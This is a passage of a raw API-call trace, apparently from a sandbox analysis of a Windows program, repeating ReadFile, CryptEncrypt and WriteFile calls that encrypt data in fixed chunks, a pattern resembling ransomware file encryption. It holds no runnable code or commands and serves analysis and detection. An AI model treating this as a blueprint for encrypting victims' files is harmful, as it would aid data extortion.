WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.091] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.091] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.091] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.091] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.092] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.092] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.092] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.092] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.092] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.092] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.092] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.092] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.093] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.093] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.093] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.094] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.094] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.094] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.094] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.094] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.094] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.094] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.094] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.094] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.096] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.096] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.096] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.096] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.096] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.096] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.097] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.097] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.097] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.097] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.097] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.097] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.098] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.098] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.098] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.098] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.098] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.098] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.098] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.098] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.099] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.099] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.099] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.099] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.099] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.099] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.100] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.100] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.100] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.100] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.100] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.100] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.100] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.100] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.100] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.100] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.100] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.100] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.100] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.100] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.100] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.101] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.101] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.101] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.101] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.101] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.101] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, 